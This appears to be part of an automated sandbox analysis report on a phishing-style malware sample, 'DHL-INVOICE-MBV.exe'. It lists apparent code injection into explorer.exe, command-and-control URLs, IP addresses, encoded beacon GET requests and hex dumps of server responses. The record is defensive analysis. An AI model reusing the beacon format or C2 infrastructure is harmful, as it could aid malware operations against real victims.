Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Extensions\net6.0-Release\System.Runtime.Extensions.pdb source: DHL-INVOICE-MBV.exe, 00000001.00000003.17542927393.0000000002913000.00000004.00000800.00020000.00000000.sdmp, System.Runtime.Extensions.dll.1.dr
Source:	Binary string: D:\SourceCode\GC3.MobileControl\production_V4.2\Service\AutoConnectHelper\obj\Release\AutoConnectHelper.pdb source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr
Source:	Binary string: firefox.pdb source: WWAHost.exe, 00000005.00000003.18734956473.000000000922F000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Extensions\net6.0-Release\System.Runtime.Extensions.pdb`3~3 p3_CorDllMainmscoree.dll source: DHL-INVOICE-MBV.exe, 00000001.00000003.17542927393.0000000002913000.00000004.00000800.00020000.00000000.sdmp, System.Runtime.Extensions.dll.1.dr

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_004065C7 FindFirstFileW,FindClose,	1_2_004065C7
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405996
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_00402868 FindFirstFileW,	1_2_00402868
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 5_2_02D42C70 FindFirstFileW,FindNextFileW,FindClose,	5_2_02D42C70

Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 4x nop then pop edi		5_2_02D38880
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 4x nop then pop edi		5_2_02D38864

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.140.149.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 51.91.236.193 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 207.60.131.46 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.238.95 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 76.223.105.230 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.252.105.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.221.20.121 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 74.208.236.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.214.80.106 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.64.242.59 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 89.31.143.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.20.200.97 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.241.217.234 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 2.57.90.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 216.40.34.41 80	Jump to behavior

Performs DNS queries to domains with low reputation

Source:

DNS query: www.clickthelink.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.driftreiki.com/d0ad/

Source: Joe Sandbox View	ASN Name: EONIX-COMMUNICATIONS-ASBLOCK-62904US EONIX-COMMUNICATIONS-ASBLOCK-62904US
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=EKBIswxubh+3rSi760MLmAr4JXvPRLtL3ozMDitkvV65RFIqiY835aWCQtue5THCT9fxMq7VmpQKPerXNr4JKGfkodcEQfh6sQ== HTTP/1.1Host: www.salemsilverpalace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=jjJd5e0DmTQo1TJERy8cZ6iwHgiAMW7tSAG3VG96MIrCLP8ueKug57ZRCpkKrz2d2a+jpP8qm1duoLHSN5X+t1/Y7kvplYFeFQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.mnrinstitutes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H+fn1MAfyMOe8tpEzipk9UZUSo3gyKb1yEBNApLz6gZQFbalc5fPAhgkZeVbYS3Sjg== HTTP/1.1Host: www.creotopi.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=nohqkTeNBtLDTjvj2EgrRXuLLYVzZlI3Z/lUYKUGfmhSQZo0Fk3aztyWPJehU7Kl8eQVGPUpo63pAyjMlhEJyeFl0k1W9K+Dpw==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.yumfechy.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=qk6bCrLFrTYlUGO/t3PC0vhi1ruOe5X2O7zMPSUEOWKorI5W5CC9pmQXmGdpZs8IhG91pCpdUbpgHMoHKfMckx4RAwKNJXBJ8w== HTTP/1.1Host: www.sbgfoundation.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=ES079lGHSpjw2zZqpiB6hd2+bwfOy28JzKwBdlhywRNcHXuvrX4iPpPrJgUvxM/8mUCKQ1JU0ePMCpPawCFs3Mp7IC1gDg4d5g==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.budgaugh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=WgPRl/FvoZMBo2mlKPlxV15+dFE2DaQPOh4rMMuZqba7P4QkcwKBZ2znWxmeG8Vu0cfzpyTmzFPFRI6Qoo1H9rMyaIuGGCESsA== HTTP/1.1Host: www.bondiev.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=m7uzBk1mijYTNPshBFAqU72ljYeWgHJ5zfNDKvzfwbEYFcgOzP3ENcHYjhFO4jv2du7qUOKEZ20+Boj0NvLgszRV7s0TsfUd4g==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.rahaingoadvice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=sqJyaOVlBjEZAVpKslMv4znBhJqv2M2fNLntWooOtuBpve/S7gqmy/xe6Ibp48h7Rh2wKtnd+VCpDIBxA7ILq3XVPp4nW+NhJA== HTTP/1.1Host: www.altruista.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=zrLMOBLzw3r4M3Z/yuOODvZ2qFQg4fDKObavmOYF/mbdwyJReU8Eih7YSll5LHsPS7aScgEYlXeSWE+YT/OxrgX5e4N2j5d5AQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.guvnorsnyc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=MT97c0J759A0sOsOXYgXf7Xc72zTUNBA1GaWpb3y0T3bjGcERslrwlwnjRFvocEHJT8Z6PNgwaS4sx6KFIijle8Vsk6Ju/84EQ== HTTP/1.1Host: www.pnpg.hairConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=pSoFcc1sljf5pE8BAUAKgRGInj4t6J/8ED+D7ZUBpkkz/bcIOpxSRb8xzFWwpHvVFx48hu31rpRymwEIqHbvimFaG2ZjSEosQg==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.migrationtask.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=CcRoIk99VuHdxqnbMe4fCWW8YB6+5lBHd7AattmFAjuGnedAqC5z1GiP1/3phXFikd8x5PSyWZu2r/HN2vGAs2KGSq5bV7fyPg== HTTP/1.1Host: www.driftreiki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=xi3nf1mTlPmwcTH1D3S90LFHOZMhXPM67udBVFKbn8eCFnECdFhGzG3NeZJo25lV+AnrsZF+e668tZdvE6JJ2Emm4ondeffVjQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.motorizedchess.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=HCnz+iAgXK+7K7+9dSYLCP83SywxThg19T0Ldayx2vBhnzv8BQwSj7Hjke2daycRt4H7k7Lpl/EZig9RgqQ7Vyy58aT11h8vxw== HTTP/1.1Host: www.donglinwangluo.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=UGTU82wtujibqQR8E2n422F7Zfw2d+xFnOfFMWTM8LMnetJ3NkFDX8bqmUj8VDzwoxc6QpBbYfZ2mv7LzdW/Xm9DjEFcRTi1ig==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.7o0i.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=EKBIswxubh+3rSi760MLmAr4JXvPRLtL3ozMDitkvV65RFIqiY835aWCQtue5THCT9fxMq7VmpQKPerXNr4JKGfkodcEQfh6sQ== HTTP/1.1Host: www.salemsilverpalace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=jjJd5e0DmTQo1TJERy8cZ6iwHgiAMW7tSAG3VG96MIrCLP8ueKug57ZRCpkKrz2d2a+jpP8qm1duoLHSN5X+t1/Y7kvplYFeFQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.mnrinstitutes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H+fn1MAfyMOe8tpEzipk9UZUSo3gyKb1yEBNApLz6gZQFbalc5fPAhgkZeVbYS3Sjg== HTTP/1.1Host: www.creotopi.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=nohqkTeNBtLDTjvj2EgrRXuLLYVzZlI3Z/lUYKUGfmhSQZo0Fk3aztyWPJehU7Kl8eQVGPUpo63pAyjMlhEJyeFl0k1W9K+Dpw==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.yumfechy.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=qk6bCrLFrTYlUGO/t3PC0vhi1ruOe5X2O7zMPSUEOWKorI5W5CC9pmQXmGdpZs8IhG91pCpdUbpgHMoHKfMckx4RAwKNJXBJ8w== HTTP/1.1Host: www.sbgfoundation.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=ES079lGHSpjw2zZqpiB6hd2+bwfOy28JzKwBdlhywRNcHXuvrX4iPpPrJgUvxM/8mUCKQ1JU0ePMCpPawCFs3Mp7IC1gDg4d5g==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.budgaugh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=WgPRl/FvoZMBo2mlKPlxV15+dFE2DaQPOh4rMMuZqba7P4QkcwKBZ2znWxmeG8Vu0cfzpyTmzFPFRI6Qoo1H9rMyaIuGGCESsA== HTTP/1.1Host: www.bondiev.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=m7uzBk1mijYTNPshBFAqU72ljYeWgHJ5zfNDKvzfwbEYFcgOzP3ENcHYjhFO4jv2du7qUOKEZ20+Boj0NvLgszRV7s0TsfUd4g==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.rahaingoadvice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=sqJyaOVlBjEZAVpKslMv4znBhJqv2M2fNLntWooOtuBpve/S7gqmy/xe6Ibp48h7Rh2wKtnd+VCpDIBxA7ILq3XVPp4nW+NhJA== HTTP/1.1Host: www.altruista.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=zrLMOBLzw3r4M3Z/yuOODvZ2qFQg4fDKObavmOYF/mbdwyJReU8Eih7YSll5LHsPS7aScgEYlXeSWE+YT/OxrgX5e4N2j5d5AQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.guvnorsnyc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?hZ=5jUpdPs&jXu=HtWyrRohZK7c8fd1APLwWRwJtB7cGxmiY3g361wIUH2W8bW5L0CPXM6H8QPzIx/FgYOXceqeXuSZGo2tEZEI7T7kC34NLHSzSQ== HTTP/1.1Host: www.christophersubala.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs HTTP/1.1Host: www.legaldanaa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=CcRoIk99VuHdxqnbMe4fCWW8YB6+5lBHd7AattmFAjuGnedAqC5z1GiP1/3phXFikd8x5PSyWZu2r/HN2vGAs2KGSq5bV7fyPg== HTTP/1.1Host: www.driftreiki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=kcJq9nCJTS4AFFwj7BlSbUJdrqCJ4OLHyr4dETNtRmrAiFNjS8qpkfsQCBiZREWazvDc3jnj6JXUK3q6f67/6iJXzv9OIKzSdg==&hZ=5jUpdPs HTTP/1.1Host: www.clickthelink.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?hZ=5jUpdPs&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H+fn1MAfyMOe8tpEzipk9UZUSo3gyKb1yEBNApLz6gZQFbalc5fPAhgkZeVbYS3Sjg== HTTP/1.1Host: www.creotopi.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 51.91.236.193 51.91.236.193
Source: Joe Sandbox View	IP Address: 51.91.236.193 51.91.236.193

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Oct 2022 11:15:28 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Oct 2022 11:15:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Oct 2022 11:15:40 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Oct 2022 11:15:42 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Oct 2022 11:15:44 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Oct 2022 11:16:12 GMTServer: ApacheContent-Length: 1080Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Oct 2022 11:16:14 GMTServer: ApacheContent-Length: 1080Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 